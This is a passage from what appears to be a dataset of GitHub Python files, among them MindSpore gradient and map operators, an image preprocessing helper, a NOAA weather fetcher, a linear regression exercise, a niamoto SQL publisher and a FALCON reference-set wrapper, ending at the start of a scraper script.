position_tuple\n return out_with_ids\n\n\ndef _combine_with_ids(grad_position, weights, out):\n \"\"\" Making resulting tuple, when return_ids is set to True. \"\"\"\n out_with_ids = []\n if grad_position:\n out_with_ids = _combine_position(\n grad_position, weights, out, out_with_ids)\n if weights is not None:\n out_with_ids = _combine_weight(\n grad_position, weights, out, out_with_ids)\n if not out_with_ids:\n raise ValueError(f\"output tuple should not be a empty tuple.\")\n return tuple(out_with_ids)\n\n\nclass _Grad(GradOperation_):\n \"\"\"\n A higher-order function which is used to generate the gradient function by position for the input function.\n \"\"\"\n\n def __init__(self, get_by_list=False, sens_param=False, get_by_position=False, has_aux=False, get_value=False,\n return_ids=False):\n \"\"\"Initialize _Grad.\"\"\"\n if not isinstance(get_by_position, bool):\n raise TypeError(f\"For '_Grad', the 'get_by_position' should be bool, \"\n f\"but got {type(get_by_position).__name__}\")\n if not isinstance(get_by_list, bool):\n raise TypeError(f\"For '_Grad', the 'get_by_list' should be bool, \"\n f\"but got {type(get_by_list).__name__}\")\n if not isinstance(sens_param, bool):\n raise TypeError(f\"For '_Grad', the 'sens_param' should be bool, \"\n f\"but got {type(sens_param).__name__}\")\n if not isinstance(has_aux, bool):\n raise TypeError(f\"For '_Grad', the 'has_aux' should be bool, \"\n f\"but got {type(has_aux).__name__}\")\n if not isinstance(get_value, bool):\n raise TypeError(f\"For '_Grad', the 'get_value' should be bool, \"\n f\"but got {type(get_value).__name__}\")\n if not isinstance(return_ids, bool):\n raise TypeError(f\"For '_Grad', the 'return_ids' should be bool, \"\n f\"but got {type(return_ids).__name__}\")\n self.get_by_position = get_by_position\n self.get_by_list = get_by_list\n self.sens_param = sens_param\n self.has_aux = has_aux\n self.get_value = get_value\n self.return_ids = return_ids\n GradOperation_.__init__(self, 'grad', False, get_by_list, sens_param, get_by_position, has_aux, get_value,\n return_ids)\n self.grad_fn = None\n self.fn = None\n self.pynative_ = False\n self.grad_position = None\n self.weights_id = None\n\n def __call__(self, fn, weights=None, grad_position=0):\n weights_id = _get_grad_weights_id(weights)\n if self.grad_fn is not None and self.fn == fn and self.grad_position == grad_position and \\\n self.weights_id == weights_id:\n return self.grad_fn\n\n def aux_fn(*args):\n outputs = fn(*args)\n if not isinstance(outputs, tuple) or len(outputs) < 2:\n raise ValueError(\"When has_aux is True, origin fn requires more than one outputs.\")\n res = (outputs[0],)\n stop_gradient = Primitive(\"StopGradient\")\n for item in outputs[1:]:\n res += (stop_gradient(item),)\n return res\n\n grad_ = _Grad(self.get_by_list, self.sens_param, self.get_by_position, self.has_aux, self.get_value,\n self.return_ids)\n # If calling Grad in GRAPH_MODE or calling Grad in functions decorated with 'jit', do grad in GRAPH_MODE\n # If calling Grad in pure PYNATIVE_MODE do grad in PYNATIVE_MODE\n # In pure PYNATIVE_MODE the out layer after_grad just used to set pynative flag for inner GradOperation.\n # In PYNATIVE_MODE calling Grad from functions decorated with 'jit', use the out layer after_grad do\n # grad in GRAPH_MODE.\n if context.get_context(\"mode\") == context.GRAPH_MODE:\n dynamic_shape_inputs = None\n if isinstance(fn, ms.nn.Cell):\n dynamic_shape_inputs = fn.get_inputs()\n if self.get_by_position:\n @jit(input_signature=dynamic_shape_inputs)\n def after_grad(*args):\n return grad_(fn, weights, grad_position)(*args)\n else:\n if self.get_by_list:\n @jit(input_signature=dynamic_shape_inputs)\n def after_grad(*args):\n return grad_(fn, weights)(*args)\n else:\n @jit(input_signature=dynamic_shape_inputs)\n def after_grad(*args):\n return grad_(fn)(*args)\n elif self.pynative_:\n if not _pynative_executor.enable_grad():\n raise RuntimeError(\"In no_grad context, you can not calculate gradient\")\n\n @_wrap_func\n def after_grad(*args, **kwargs):\n res = self._pynative_forward_run(fn, grad_, weights, args, kwargs)\n _pynative_executor.grad(fn, grad_, weights, grad_position, *args, **kwargs)\n out = _pynative_executor()\n out = _grads_divided_by_device_num_if_recomputation(out)\n if self.return_ids and out:\n out = _combine_with_ids(grad_position, weights, out)\n if self.get_value:\n return res, out\n if self.has_aux:\n return out, res[1:]\n return out\n else:\n if not _pynative_executor.enable_grad():\n raise RuntimeError(\"In no_grad context, you can not calculate gradient\")\n grad_.pynative_ = True\n fn_ = fn\n if self.has_aux:\n fn_ = aux_fn\n # after_grad of this branch can't use @jit, just directly call grad_\n if self.get_by_position:\n def after_grad(*args, **kwargs):\n return grad_(fn_, weights, grad_position)(*args, **kwargs)\n else:\n if self.get_by_list:\n def after_grad(*args, **kwargs):\n return grad_(fn_, weights)(*args, **kwargs)\n else:\n def after_grad(*args, **kwargs):\n return grad_(fn_)(*args, **kwargs)\n\n self.grad_fn = after_grad\n self.fn = fn\n self.grad_position = grad_position\n self.weights_id = weights_id\n return self.grad_fn\n\n def _pynative_forward_run(self, fn, grad, weights, args, kwargs):\n \"\"\" Pynative forward runs to build grad graph. \"\"\"\n new_kwargs = kwargs\n outputs = ()\n if self.sens_param:\n if 'sens' in kwargs.keys():\n new_kwargs = kwargs.copy()\n new_kwargs.pop('sens')\n else:\n args = args[:-1]\n if isinstance(fn, (FunctionType, MethodType)):\n if not _pynative_executor.check_run(grad, fn, weights, self.grad_position, *args, **new_kwargs):\n _pynative_executor.set_grad_flag(True)\n _pynative_executor.new_graph(fn, *args, **new_kwargs)\n outputs = fn(*args, **new_kwargs)\n _pynative_executor.end_graph(fn, outputs, *args, **new_kwargs)\n return outputs\n else:\n # Check if fn has run already.\n if not _pynative_executor.check_run(grad, fn, weights, self.grad_position, *args, **new_kwargs):\n fn.set_grad()\n outputs = fn(*args, **new_kwargs)\n fn.set_grad(False)\n return outputs\n if (self.get_value or self.has_aux) and not outputs:\n outputs = fn(*args, **new_kwargs)\n return outputs\n\n\nclass _Vmap(VmapOperation_):\n \"\"\"\n A higher-order function which is used to generate the vectorizing map function.\n \"\"\"\n\n def __init__(self):\n \"\"\"Initialize _Vmap.\"\"\"\n VmapOperation_.__init__(self, 'vmap')\n self.vmap_fn = None\n self.fn = None\n self.in_axes = None\n self.out_axes = None\n\n def __call__(self, fn, in_axes=0, out_axes=0):\n if self.vmap_fn is not None and self.fn == fn and self.in_axes == in_axes and self.out_axes == out_axes:\n return self.vmap_fn\n\n vmap_ = self\n\n @jit\n def after_vmap(*args, **kwargs):\n return vmap_(fn, in_axes, out_axes)(*args, **kwargs)\n\n self.vmap_fn = after_vmap\n self.fn = fn\n self.in_axes = in_axes\n self.out_axes = out_axes\n return self.vmap_fn\n\n\nclass MultitypeFuncGraph(MultitypeFuncGraph_):\n \"\"\"\n MultitypeFuncGraph is a class used to generate overloaded functions, considering different types as inputs.\n Initialize an `MultitypeFuncGraph` object with name, and use `register` with input types as the decorator\n for the function to be registered. And the object can be called with different types of inputs,\n and work with `HyperMap` and `Map`.\n\n Args:\n name (str): Operator name.\n read_value (bool, optional): If the registered function do not need to set value on Parameter,\n and all inputs will pass by value, set `read_value` to ``True`` . Default: ``False`` .\n\n Raises:\n ValueError: If failed to find a matching function for the given arguments.\n\n Supported Platforms:\n ``Ascend`` ``GPU`` ``CPU``\n\n Examples:\n >>> # `add` is a metagraph object which will add two objects according to\n >>> # input type using \".register\" decorator.\n >>> from mindspore import Tensor\n >>> from mindspore import ops\n >>> from mindspore import dtype as mstype\n >>> import mindspore.ops as ops\n >>>\n >>> tensor_add = ops.Add()\n >>> add = ops.MultitypeFuncGraph('add')\n >>> @add.register(\"Number\", \"Number\")\n ... def add_scala(x, y):\n ... return x + y\n >>> @add.register(\"Tensor\", \"Tensor\")\n ... def add_tensor(x, y):\n ... return tensor_add(x, y)\n >>> output = add(1, 2)\n >>> print(output)\n 3\n >>> output = add(Tensor([0.1, 0.6, 1.2], dtype=mstype.float32), Tensor([0.1, 0.6, 1.2], dtype=mstype.float32))\n >>> print(output)\n [0.2 1.2 2.4]\n \"\"\"\n\n def __init__(self, name, read_value=False, need_raise=False):\n \"\"\"Initialize MultitypeFuncGraph.\"\"\"\n MultitypeFuncGraph_.__init__(self, name, need_raise)\n self.entries = list()\n if read_value:\n self.set_signatures((\n sig.make_sig('args', sig.sig_rw.RW_READ, sig.sig_kind.KIND_VAR_POSITIONAL),))\n\n def __call__(self, *args):\n if len(self.entries) == 1:\n output = self.entries[0][1](*args)\n return output\n types = tuple(map(mstype.get_py_obj_dtype, args))\n for sigs, fn in self.entries:\n if len(sigs) != len(types):\n continue\n if any(not mstype._issubclass_(type_, sig) for sig, type_ in zip(sigs, types)): # pylint: disable=W0212\n continue\n output = fn(*args)\n return output\n raise ValueError(f\"For 'MultitypeFuncGraph', cannot find fn match given args. Got (sigs, fn): {self.entries}, \"\n f\"and (dtype, args): {types}.\")\n\n def register(self, *type_names):\n \"\"\"\n Register a function for the given type string.\n\n Args:\n type_names (Union[str, :class:`mindspore.dtype`]): Inputs type names or types list.\n\n Return:\n decorator, a decorator to register the function to run, when called under the\n types described in `type_names`.\n \"\"\"\n\n def deco(fn):\n def convert_type(type_input):\n if isinstance(type_input, str):\n return mstype.typing.str_to_type(type_input)\n if not isinstance(type_input, mstype.Type):\n raise TypeError(f\"For 'MultitypeFuncGraph', register only support str or {mstype.Type}, but got \"\n f\"'type_input': {type_input}.\")\n return type_input\n\n types = tuple(map(convert_type, type_names))\n self.register_fn(type_names, fn)\n self.entries.append((types, fn))\n return fn\n\n return deco\n\n # pylint: disable=missing-docstring\n def set_doc_url(self, doc_url):\n self.set_doc_url_(doc_url)\n\n\nclass HyperMap(HyperMap_):\n \"\"\"\n Hypermap will apply the set operation to input sequences.\n\n Apply the operations to every element of the sequence or nested sequence. Different\n from `mindspore.ops.Map`, the `HyperMap` supports to apply on nested structure.\n\n Args:\n ops (Union[MultitypeFuncGraph, None]): `ops` is the operation to apply. If `ops` is `None`,\n the operations should be put in the first input of the instance. Default is None.\n reverse (bool): The optimizer needs to be inverted in some scenarios to improve parallel performance,\n general users please ignore. `reverse` is the flag to decide if apply the operation reversely.\n Only supported in graph mode. Default is False.\n\n Inputs:\n - **args** (Tuple[sequence]) -\n\n - If `ops` is not `None`, all the inputs should be sequences with the same length.\n And each row of the sequences will be the inputs of the operation.\n - If `ops` is `None`, the first input is the operation, and the others are inputs.\n\n Note:\n Except for the operation input, the number of inputs should be equal to the number of inputs to `ops`.\n\n Outputs:\n Sequence or nested sequence, the sequence of output after applying the function.\n e.g. `operation(args[0][i], args[1][i])`.\n\n Raises:\n TypeError: If `ops` is neither MultitypeFuncGraph nor None.\n TypeError: If `args` is not a Tuple.\n\n Supported Platforms:\n ``Ascend`` ``GPU`` ``CPU``\n\n Examples:\n >>> from mindspore import Tensor, ops\n >>> from mindspore import dtype as mstype\n >>> nest_tensor_list = ((Tensor(1, mstype.float32), Tensor(2, mstype.float32)),\n ... (Tensor(3, mstype.float32), Tensor(4, mstype.float32)))\n >>> # square all the tensor in the nested list\n >>>\n >>> square = ops.MultitypeFuncGraph('square')\n >>> @square.register(\"Tensor\")\n ... def square_tensor(x):\n ... return ops.square(x)\n >>>\n >>> common_map = ops.HyperMap()\n >>> output = common_map(square, nest_tensor_list)\n >>> print(output)\n ((Tensor(shape=[], dtype=Float32, value= 1), Tensor(shape=[], dtype=Float32, value= 4)),\n (Tensor(shape=[], dtype=Float32, value= 9), Tensor(shape=[], dtype=Float32, value= 16)))\n >>> square_map = ops.HyperMap(square, False)\n >>> output = square_map(nest_tensor_list)\n >>> print(output)\n ((Tensor(shape=[], dtype=Float32, value= 1), Tensor(shape=[], dtype=Float32, value= 4)),\n (Tensor(shape=[], dtype=Float32, value= 9), Tensor(shape=[], dtype=Float32, value= 16)))\n \"\"\"\n\n def __init__(self, ops=None, reverse=False):\n \"\"\"Initialize HyperMap.\"\"\"\n self.ops = ops\n if ops:\n HyperMap_.__init__(self, reverse, ops)\n else:\n HyperMap_.__init__(self, reverse)\n\n def __call__(self, *args):\n func = self.ops\n args_list = args\n hypermap = self\n if self.ops is None:\n func = args[0]\n args_list = args[1:]\n hypermap = partial(self, func)\n # is leaf\n if not isinstance(args_list[0], (tuple, list)):\n return func(*args_list)\n return tuple(map(hypermap, *args_list))\n\n\nclass Map(Map_):\n \"\"\"\n Map will apply the set operation on input sequences.\n\n Apply the operations to every element of the sequence.\n\n Args:\n ops (Union[MultitypeFuncGraph, None]): `ops` is the operation to apply. If `ops` is `None`,\n the operations should be put in the first input of the instance. Default: ``None`` .\n reverse (bool): The optimizer needs to be inverted in some scenarios to improve parallel performance,\n general users please ignore. `Reverse` is the flag to decide if apply the operation reversely.\n Only supported in graph mode. Default is ``False`` .\n\n Inputs:\n - **args** (Tuple[sequence]) - If `ops` is not `None`, all the inputs should be the same length sequences,\n and each row of the sequences. e.g. If the length of args is 2, and for `i` in length of each sequence\n `(args[0][i], args[1][i])` will be the input of the operation.\n\n If `ops` is `None`, the first input is the operation, and the other is inputs.\n\n Outputs:\n Sequence, the sequence of output after applying the function. e.g. `operation(args[0][i], args[1][i])`.\n\n Supported Platforms:\n ``Ascend`` ``GPU`` ``CPU``\n\n Examples:\n >>> from mindspore import dtype as mstype\n >>> from mindspore import Tensor, ops\n >>> from mindspore.ops import MultitypeFuncGraph, Map\n >>> tensor_list = (Tensor(1, mstype.float32), Tensor(2, mstype.float32), Tensor(3, mstype.float32))\n >>> # square all the tensor in the list\n >>>\n >>> square = MultitypeFuncGraph('square')\n >>> @square.register(\"Tensor\")\n ... def square_tensor(x):\n ... return ops.square(x)\n >>>\n >>> common_map = Map()\n >>> output = common_map(square, tensor_list)\n >>> print(output)\n (Tensor(shape=[], dtype=Float32, value= 1), Tensor(shape=[], dtype=Float32, value= 4),\n Tensor(shape=[], dtype=Float32, value= 9))\n >>> square_map = Map(square, False)\n >>> output = square_map(tensor_list)\n >>> print(output)\n (Tensor(shape=[], dtype=Float32, value= 1), Tensor(shape=[], dtype=Float32, value= 4),\n Tensor(shape=[], dtype=Float32, value= 9))\n \"\"\"\n\n def __init__(self, ops=None, reverse=False):\n \"\"\"Initialize Map.\"\"\"\n self.ops = ops\n if ops:\n Map_.__init__(self, reverse, ops)\n else:\n Map_.__init__(self, reverse)\n\n def __call__(self, *args):\n func = self.ops\n args_list = args\n if self.ops is None:\n func = args[0]\n args_list = args[1:]\n return tuple(map(func, *args_list))\n\n\nclass _ListAppend(ListAppend_):\n \"\"\"\n A metafuncgraph class that append one element to list.\n\n Args:\n name (str): The name of the metafuncgraph object.\n \"\"\"\n # `__init__` method removed entirely\n def __call__(self, *args):\n pass\n\n\n_append = _ListAppend(\"append\")\n\n\nclass _ListInsert(ListInsert_):\n \"\"\"\n A metafuncgraph class that insert one element to list.\n\n Args:\n name (str): The name of the metafuncgraph object.\n \"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize _ListInsert.\"\"\"\n ListInsert_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\n_insert = _ListInsert(\"insert\")\n\n\nclass _ListPop(ListPop_):\n \"\"\"\n A metafuncgraph class that pop one element from list.\n\n Args:\n name (str): The name of the metafuncgraph object.\n \"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize _ListPop.\"\"\"\n ListPop_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\n_pop = _ListPop(\"pop\")\n\n\nclass _ListClear(ListClear_):\n \"\"\"\n A metafuncgraph class that clear the list.\n\n Args:\n name (str): The name of the metafuncgraph object.\n \"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize _ListClear.\"\"\"\n ListClear_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\n_list_clear = _ListClear(\"clear\")\n\n\nclass _ListReverse(ListReverse_):\n \"\"\"\n A metafuncgraph class that reverse the list.\n\n Args:\n name (str): The name of the metafuncgraph object.\n \"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize _ListReverse.\"\"\"\n ListReverse_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\n_reverse = _ListReverse(\"reverse\")\n\n\nclass _ListExtend(ListExtend_):\n \"\"\"\n A metafuncgraph class that append another list to the end of the list.\n\n Args:\n name (str): The name of the metafuncgraph object.\n \"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize _ListExtend.\"\"\"\n ListExtend_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\n_extend = _ListExtend(\"extend\")\n\n\nclass _DictClear(DictClear_):\n \"\"\"\n A metafuncgraph class that clear the dict.\n\n Args:\n name (str): The name of the metafuncgraph object.\n \"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize _DictClear.\"\"\"\n DictClear_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\n_dict_clear = _DictClear(\"clear\")\n\n\nclass _DictHasKey(DictHasKey_):\n \"\"\"\n A metafuncgraph class that Check if key is in dict.\n\n Args:\n name (str): The name of the metafuncgraph object.\n \"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize _DictHasKey.\"\"\"\n DictHasKey_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\n_haskey = _DictHasKey(\"has_key\")\n\n\nclass _DictUpdate(DictUpdate_):\n \"\"\"\n A metafuncgraph class that append another dict to the end of the dict.\n\n Args:\n name (str): The name of the metafuncgraph object.\n \"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize _DictUpdate.\"\"\"\n DictUpdate_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\n_update = _DictUpdate(\"update\")\n\n\nclass _DictFromKeys(DictFromKeys_):\n \"\"\"\n A metafuncgraph class that creates a new dict from the given sequence and value.\n\n Args:\n name (str): The name of the metafuncgraph object.\n \"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize _DictFromKeys.\"\"\"\n DictFromKeys_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\n_fromkeys = _DictFromKeys(\"fromkeys\")\n\n\nclass _Tail(Tail_):\n \"\"\"\n A metafuncgraph class that generates tail elements of the tuple.\n\n Args:\n name (str): The name of the metafuncgraph object.\n \"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize _Tail.\"\"\"\n Tail_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\ntail = _Tail('tail')\n\n\nclass _ZipOperation(ZipOperation_):\n \"\"\"Generates a tuple of zip iterations for inputs.\"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize _ZipOperation.\"\"\"\n ZipOperation_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\nzip_operation = _ZipOperation('zip_operation')\n\"\"\"`zip_operation` will generate a tuple of zip iterations of inputs.\"\"\"\n","repo_name":"mindspore-ai/mindspore","sub_path":"mindspore/python/mindspore/ops/composite/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":44723,"program_lang":"python","lang":"en","doc_type":"code","stars":3831,"dataset":"github-code","pt":"39"} +{"seq_id":"28592621532","text":"\n'''Created on 4/12/23 by Cristian Finley\n last updated: 4/17/23 '''\n\n#############JPEG to RGB Pre-processing#################\nfrom PIL import Image\nimport numpy as np\n\n'''Turns a JPEG image into an image with width = 400 px and height = 400 px unless otherwise specified\ninputs: \n filename - image file compatible with pillo\n width(optional) - desired image array width\n height(optional) - desired image array height\nreturns:\n matrix of RGB px values'''\ndef preprocessImage (filename,width=400,height=400):\n im = Image.open(filename)\n width = 400\n height = 400\n \n if im.size[0] > width:\n im = im.crop((((im.size[0]-width)/2),0,(im.size[0]-(im.size[0]-width)/2),im.size[1]))\n if im.size[1] > height:\n im = im.crop((0,((im.size[1]-height)/2),im.size[0],(im.size[1]-(im.size[1]-height)/2)))\n im_matrix = np.array(im)\n print(im_matrix.size)\n im.close()\n return im_matrix\n \n\n#Random PILLOW commands\n#im.show()\n#print(im.format)\n#print(im.mode)\n#print(im.size)\n#print(im.width, im.height)\n#print(im.info)\n#left, upper, right, lower\n#cropped.show()\n#save the cropped image\n#cropped.save('images/croppedBeach1.jpg')","repo_name":"cfinley569/Spermatid-Image-Analysis","sub_path":"ImagePreprocessing.py","file_name":"ImagePreprocessing.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"34498180371","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jan 12 10:41:12 2022\r\n\r\n@authors: Moin, Gargi, Rishabh\r\n\"\"\"\r\nimport urllib.request\r\nimport math\r\n\r\n\r\ndef line_averages(filename):\r\n with open(filename, 'r') as f:\r\n lines = f.readlines()\r\n for line in lines:\r\n s = 0.0\r\n for elem in line.split(','):\r\n s = s + int(elem)\r\n avg = s/len(line.split(','))\r\n print(avg)\r\n\r\n\r\ndef noaa_string():\r\n \"\"\"Fetch from the Internet and return the current NOAA METAR\r\n weather observation data for EDDH (Hamburg Airport) as a string.\r\n \"\"\"\r\n url = \"http://tgftp.nws.noaa.gov/data/observations/metar/decoded/EDDH.TXT\"\r\n noaa_data_string = urllib.request.urlopen(url).read()\r\n return noaa_data_string.decode(\"utf-8\")\r\n\r\n\r\ndef noaa_temperature(s):\r\n y = []\r\n for elem in range(len(s)):\r\n y = s.split()\r\n for t in y:\r\n if t == \"Temperature:\":\r\n x = y.index(t)+1\r\n print(y[x])\r\n d = (int(y[x])-32)*(5/9)\r\n return math.ceil(d)\r\n","repo_name":"rishabhmoolya/MPSD_Workshop","sub_path":"training4.py","file_name":"training4.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"35226885082","text":"#Simple regression\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 24 23:49:15 2018\n\n@author: karta\n\"\"\"\n#importing libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n#importing datasets\ndataset = pd.read_csv(\"Salary_Data.csv\")\n\nx = dataset.iloc[:,:-1].values\ny = dataset.iloc[:,1].values\n\n#Spliting the data into training and test set\nfrom sklearn.cross_validation import train_test_split\nx_train,x_test,y_train,y_test = train_test_split(x,y,test_size = 1/3, random_state = 0)\n\n#Training the simple regression model\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(x_train,y_train)\n\n#Askinf the model to predict the test results\ny_pred = regressor.predict(x_test)\n\n# Visulalising the training set results\nplt.scatter(x_train, y_train, color='red')\nplt.plot(x_train, regressor.predict(x_train))\nplt.title(\"Salary vs Experience (Training set)\")\nplt.xlabel('Experience')\nplt.ylabel(\"Salary\")\n\n# Visulalising the test set results\nplt.scatter(x_test, y_test, color='red')\nplt.plot(x_train, regressor.predict(x_train))\nplt.title(\"Salary vs Experience (Test set)\")\nplt.xlabel('Experience')\nplt.ylabel(\"Salary\")","repo_name":"KartavyaKothari/Machine-learning-learning","sub_path":"Part 2 - Regression/Section 4 - Simple Linear Regression/simple_LR.py","file_name":"simple_LR.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"23526084548","text":"# coding: utf-8\n\nimport pandas as pd\n\nfrom niamoto.conf import settings\nfrom niamoto.data_publishers.base_data_publisher import BaseDataPublisher\nfrom niamoto.data_marts.dimensions.vector_dimension import VectorDimension\nfrom niamoto.db.connector import Connector\nfrom niamoto.log import get_logger\n\n\nLOGGER = get_logger(__name__)\n\n\nclass VectorHierarchyPublisher(BaseDataPublisher):\n \"\"\"\n Publish vector hierarchies from the niamoto vector database.\n Produce an association table containing the identifiers of nested vectors.\n Uses the data from published vector dimensions.\n \"\"\"\n\n @classmethod\n def get_key(cls):\n return 'vector_hierarchy'\n\n @classmethod\n def get_description(cls):\n return \"Publish a vector hierarchy from the niamoto vector database.\"\n\n @classmethod\n def get_publish_formats(cls):\n return []\n\n def _process(self, vector_names, *args, buffer_size=0.001, **kwargs):\n \"\"\"\n :param vector_names: List of the vector names for the hierarchy.\n Ordering is important, the first element corresponds to the\n highest level of the hierarchy while the last element corresponds\n to the smallest level of the hierarchy.\n :return: A GeoDataFrame corresponding to the vector to publish.\n \"\"\"\n level_ids = ','.join(\n [\"{}.id AS {}_id\".format(v, v) for v in vector_names]\n )\n where_clause = \"WHERE \" + \" AND \".join(\n [\"{}.id IS NOT NULL\".format(v) for v in vector_names]\n )\n highest_level = vector_names.pop(0)\n dim_tables = \"{schema}.{tb} AS {tb}\".format(**{\n 'schema': settings.NIAMOTO_DIMENSIONS_SCHEMA,\n 'tb': highest_level,\n })\n previous_level = highest_level\n previous_geom = VectorDimension(highest_level).geom_col[0]\n for level in vector_names:\n geom = VectorDimension(level).geom_col[0]\n dim_tables += \\\n \"\"\"\n LEFT JOIN {schema}.{tb} AS {tb}\n ON ST_Within(\n ST_Buffer({tb}.{geom}, -{buffer}),\n {prev_tb}.{prev_geom}\n )\n \"\"\".format(**{\n 'schema': settings.NIAMOTO_DIMENSIONS_SCHEMA,\n 'tb': level,\n 'prev_tb': previous_level,\n 'geom': geom,\n 'prev_geom': previous_geom,\n 'buffer': buffer_size,\n })\n previous_level = level\n previous_geom = geom\n sql = \\\n \"\"\"\n SELECT {level_ids}\n FROM {dim_tables}\n {where_clause};\n \"\"\".format(\n **{\n 'level_ids': level_ids,\n 'dim_tables': dim_tables,\n 'where_clause': where_clause,\n }\n )\n with Connector.get_connection() as connection:\n df = pd.read_sql(sql, connection)\n return df\n","repo_name":"niamoto/niamoto-core","sub_path":"niamoto/data_publishers/vector_hierarchy_publisher.py","file_name":"vector_hierarchy_publisher.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"8873877812","text":"\"\"\"A simple wrapper for run_bam_to_fasta\nin pbcoretools.tasks.converters\n\"\"\"\nfrom __future__ import absolute_import\nfrom ..sys import system\n#from pbcoretools.tasks.converters import run_fasta_to_reference, run_fasta_to_referenceset\nfrom pbcore.io import (ContigSet, ReferenceSet)\nimport argparse\nimport logging\nimport sys\nimport os.path as op\n\nlog = logging.getLogger(__name__)\n\ndef run_fasta_to_referenceset(input_file_name, output_file_name, prog):\n \"\"\"Copied from pbsmrtpipe/pb_tasks/pacbio.py:run_fasta_to_referenceset()\n \"\"\"\n args = ['dataset', \"create\", \"--type ReferenceSet\", \"--generateIndices\",\n output_file_name, input_file_name]\n system(\" \".join(args))\n\ndef run_fasta_to_reference(input_file_name, output_file_name,\n organism, reference_name,\n ploidy):\n \"\"\"Copied from pbcoretools/tasks/converters.py:run_fasta_to_reference()\n \"\"\"\n ds_in = ContigSet(input_file_name)\n if len(ds_in.externalResources) > 1:\n raise TypeError(\"Only a single FASTA file is supported as input.\")\n fasta_file_name = ds_in.externalResources[0].resourceId\n output_dir_name = op.dirname(output_file_name)\n args = [\n \"fasta-to-reference\",\n \"--organism\", organism,\n \"--ploidy\", ploidy,\n \"--debug\",\n fasta_file_name,\n output_dir_name,\n reference_name\n ]\n log.info(\" \".join(args))\n system(\" \".join(args))\n ref_file = op.join(output_dir_name, reference_name, \"referenceset.xml\")\n assert op.isfile(ref_file)\n with ReferenceSet(ref_file, strict=True) as ds_ref:\n ds_ref.makePathsAbsolute()\n log.info(\"saving final ReferenceSet to {f!r}\".format(f=output_file_name))\n ds_ref.write(output_file_name)\n\ndef run(fasta, ref):\n try:\n # This uses Python + BAM library.\n run_fasta_to_referenceset(fasta, ref, 'dataset')\n return\n except Exception:\n log.exception('We will try another someting else.')\n\n try:\n # This uses Python + BAM library.\n # the '.py' name difference will be resolved in pbdataset/pbcoretools, but\n # for now, work with either\n run_fasta_to_referenceset(fasta, ref, 'dataset.py')\n return\n except Exception:\n log.exception('We will try someting else.')\n raise\n\n try:\n # This uses pbscala and also runs sawriter.\n reference_name = op.splitext(op.basename(fasta))[0]\n organism = \"unknown\"\n ploidy = \"haploid\"\n run_fasta_to_reference(fasta, ref, organism=organism, reference_name=reference_name, ploidy=ploidy)\n except Exception:\n log.exception('Out of ideas.')\n raise\n\n\ndef main(argv=sys.argv):\n description = \"\"\"Create referenceset XML from fasta.\n\"\"\"\n epilog = \"\"\"\nThere might extra files too. We use fasta-to-reference (from pbscala)\nif available (which would also run sawriter).\nOtheriwse, we use 'dataset create'.\nThe fasta might be copied, and the dataset should refer to it absolutely (I think).\n\"\"\"\n parser = argparse.ArgumentParser(\n description=description,\n epilog=epilog,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n #parser.add_argument('--logging',\n # help='.ini or .json config file for Python logging module')\n parser.add_argument('fasta',\n help='Input fasta filename.')\n parser.add_argument('ref',\n help='Output referenceset XML filename.')\n args = parser.parse_args(argv[1:])\n log.info('RUNNING run_fasta2reference: {}'.format(repr(args)))\n run(**vars(args))\n\nif __name__ == \"__main__\":\n logging.basicConfig()\n logging.getLogger().setLevel(logging.DEBUG)\n main(sys.argv)\n","repo_name":"lpp1985/lpp_Script","sub_path":"pacbiolib/pacbio/pythonpkgs/falconpolish/lib/python2.7/site-packages/falcon_polish/mains/run_fasta2referenceset.py","file_name":"run_fasta2referenceset.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"39"} +{"seq_id":"16218855564","text":"import sys\nimport django\nimport os\nimport pathlib\nimport js2py\nimport threading\nfrom django_redis import get_redis_connection\nif __name__ == \"__main__\":\n basedir = str(pathlib.Path(__file__).resolve().parent.parent)\n os.chdir(basedir)\n sys.path.append(basedir)\n os.environ['DJANGO_SETTINGS_MODULE'] = 'soyoung.settings'\n django.setup()\n\nfrom grab.createsession import createsession\nfrom grab.models import Product, Hospital, Reviewer,Diary,Doctor\nimport datetime, time\nimport re, json\nimport psutil\nfrom django.conf import settings\nfrom django.core.cache import cache\nfrom dotmap import DotMap\nfrom bs4 import BeautifulSoup\nimport sys\ndef beforecheck(name):\n pidfile = f'{name}.pid'\n if 